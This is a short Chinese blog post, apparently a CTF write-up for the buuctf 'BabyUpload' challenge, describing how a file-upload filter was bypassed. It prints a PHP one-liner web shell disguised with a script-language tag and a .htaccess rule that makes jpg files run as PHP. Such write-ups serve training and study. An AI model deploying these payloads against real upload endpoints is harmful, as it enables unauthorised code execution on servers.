buuctf-BabyUpload

阅读 56

2022-03-26

上传php文件,过滤后缀

上传jpg文件

上传png文件,和文件类型有关(Content-Type)

 

 所以应该要上传jpg文件类型

上传一句话木马就会出现问题,筛查后发现是<?php

 改一下木马格式就可以了

<script language="php">eval($_REQUEST[value])</script>

 但是后缀无法修改成php类型,各种方式都试过了

想到.htaccess和.user.ini

和文件类型有关,就修改文件类型

<FilesMatch "jpg">
SetHandler application/x-httpd-php
</FilesMatch>

 我之前存的几个代码好像都不能用

精彩评论(0)

0 0 举报